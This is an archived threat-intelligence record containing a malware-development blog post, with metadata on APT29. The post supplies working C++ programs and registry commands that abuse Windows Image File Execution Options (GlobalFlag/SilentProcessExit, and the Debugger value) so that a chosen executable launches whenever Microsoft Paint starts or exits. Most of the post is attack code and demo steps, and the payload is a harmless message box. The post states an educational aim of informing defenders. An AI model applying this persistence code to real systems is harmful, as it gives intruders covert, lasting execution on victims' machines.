{ "id": "0fa16817-d724-4a05-b4ef-bb25c85cd5f8", "created_at": "2026-04-06T00:12:57.516615Z", "updated_at": "2026-04-10T13:11:39.893039Z", "deleted_at": null, "sha1_hash": "3f90d8bf8b6b08fc1eb53f642921b060d9ce72a3", "title": "Malware development: persistence - part 10. Using Image File Execution Options. Simple C++ example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1784894, "plain_text": "Malware development: persistence - part 10. Using Image File\r\nExecution Options. Simple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-09-10 · Archived: 2026-04-05 13:02:07 UTC\r\n4 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the result of my own research into one of the interesting malware persistence trick: via Image File\r\nExecution Options.\r\nImage File Execution OptionsPermalink\r\nIFEO enables developers to attach a debugger to an application or process. This allows the debugger/application\r\nto run concurrently with the application being debugged.\r\nHow to set this feature? We can launch a process/program when another application silently exits.\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 1 of 20\n\nSilent exit for an application means the application has been terminated in one of two ways:\r\n1. Self termination by calling ExitProcess\r\n2. Another process terminates the monitored process by calling TerminateProcess\r\nThis is configurable via the following registry key:\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\r\npractical examplePermalink\r\nLet’s go to run our malware once Microsoft Paint ( mspaint.exe ) is silently exiting.\r\nSo, let’s say we have our “malware” ( hack.cpp ):\r\n/*\r\nhack.cpp\r\nevil app for windows persistence via IFEO\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBox(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nAs you can see, as usually, I use “meow-meow” message box “malware” =^..^=\r\nThen, create persistence script for modify registry ( pers.cpp ):\r\n/*\r\npers.cpp\r\nwindows persistence via IFEO (GlobalFlag)\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n DWORD gF = 512;\r\n DWORD rM = 1;\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 2 of 20\n\n// image file\r\n const char* img = \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\mspaint.exe\"\r\n // silent exit\r\n const char* silent = \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\mspaint.exe\";\r\n // evil app\r\n const char* exe = \"Z:\\\\2022-09-10-malware-pers-10\\\\hack.exe\";\r\n // GlobalFlag\r\n // LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image\r\n LONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_Q\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mspaint.exe\" /v G\r\n RegSetValueEx(hkey, (LPCSTR)\"GlobalFlag\", 0, REG_DWORD, (const BYTE*)\u0026gF, sizeof(gF));\r\n RegCloseKey(hkey);\r\n }\r\n // res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProc\r\n res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)silent, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUE\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v ReportingMod\r\n // reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v MonitorProce\r\n RegSetValueEx(hkey, (LPCSTR)\"ReportingMode\", 0, REG_DWORD, (const BYTE*)\u0026rM, sizeof(rM));\r\n RegSetValueEx(hkey, (LPCSTR)\"MonitorProcess\", 0, REG_SZ, (unsigned char*)exe, strlen(exe));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nSo what have we done here? Firstly, we created SilentProcessExit key under\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion , then enabled silent process exit monitoring feature by\r\nadding GlobalFlag :\r\n//...\r\nLONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUE\r\n//...\r\n//...\r\n// reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mspaint.exe\" /v Globa\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 3 of 20\n\nRegSetValueEx(hkey, (LPCSTR)\"GlobalFlag\", 0, REG_DWORD, (const BYTE*)\u0026gF, sizeof(gF));\r\n//...\r\nBy setting MonitorProcess to ...\\hack.exe and ReportingMode to 1 , every silent exit of mspaint.exe\r\nwill now trigger the execution of our “malware” hack.exe :\r\n//...\r\nRegSetValueEx(hkey, (LPCSTR)\"ReportingMode\", 0, REG_DWORD, (const BYTE*)\u0026rM, sizeof(rM));\r\nRegSetValueEx(hkey, (LPCSTR)\"MonitorProcess\", 0, REG_SZ, (unsigned char*)exe, strlen(exe));\r\ndemoPermalink\r\nLet’s go to see everything in action. Compile malware:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nRun it, just for check correctness:\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 4 of 20\n\nSo, check registry keys before:\r\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" /s\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 5 of 20\n\nalso SilentProcessExit :\r\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\" /s\r\nAs you can see, as expected, some registry keys are missing for our target application. So when it starts and closes\r\nnothing happens:\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 6 of 20\n\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 7 of 20\n\nWell, now let’s compile:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nand run our script for persistence pers.exe , then check registry keys again:\r\n.\\pers.exe\r\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" /s\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 8 of 20\n\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\" /s\r\nFinally, run mspaint.exe again:\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 9 of 20\n\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 10 of 20\n\nand close it:\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 11 of 20\n\nThe ReportingMode registry key enables the Windows Error Reporting process ( WerFault.exe ) which will be\r\nthe parent process of the MonitorProcess key value hack.exe :\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 12 of 20\n\nWerFault.exe - used for tracking errors related to operating system, Windows features and\r\napplications.\r\nIFEO debugger typePermalink\r\nThere are another implementation of IFEO via debugger key. Just create a debugger to a victim process in this\r\nregistry key:\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mspaint.exe\r\nthen only requires the malicious application to be stored in System32 .\r\nSo source code is simple and looks like this:\r\n/*\r\npers2.cpp\r\nwindows persistence via IFEO 2(Debugger)\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 13 of 20\n\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n DWORD gF = 512;\r\n DWORD rM = 1;\r\n // image file\r\n const char* img = \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\mspaint.exe\"\r\n // evil app\r\n const char* exe = \"hack.exe\";\r\n // Debugger\r\n LONG res = RegCreateKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)img, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_Q\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mspaint.exe\" /v D\r\n RegSetValueEx(hkey, (LPCSTR)\"Debugger\", 0, REG_SZ, (unsigned char*)exe, strlen(exe));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nLet’s compile it:\r\nx86_64-w64-mingw32-g++ -O2 pers2.cpp -o pers2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata\r\nAn example of how this appears in action:\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 14 of 20\n\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 15 of 20\n\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 16 of 20\n\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 17 of 20\n\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 18 of 20\n\nWhen the Microsoft Paint process ( mspaint.exe ) is launched this will cause the malware to be executed.\r\nPerfect!\r\nThis persistence trick is used by APT29 group and software like SUNBURST in the wild.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers arsenal.\r\nATT\u0026CK MITRE: IFEO Injection\r\nMSDN: Monitoring Silent Process Exit\r\nPersistence using GlobalFlags in Image File Execution Options - Hidden from autoruns.exe\r\nAPT29\r\nSUNBURST\r\nsource code on github\r\nThis is a practical case for educational purposes only.\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 19 of 20\n\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nhttps://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html" ], "report_names": [ "malware-pers-10.html" ], "threat_actors": [ { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434377, "ts_updated_at": 1775826699, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3f90d8bf8b6b08fc1eb53f642921b060d9ce72a3.pdf", "text": "https://archive.orkl.eu/3f90d8bf8b6b08fc1eb53f642921b060d9ce72a3.txt", "img": "https://archive.orkl.eu/3f90d8bf8b6b08fc1eb53f642921b060d9ce72a3.jpg" } }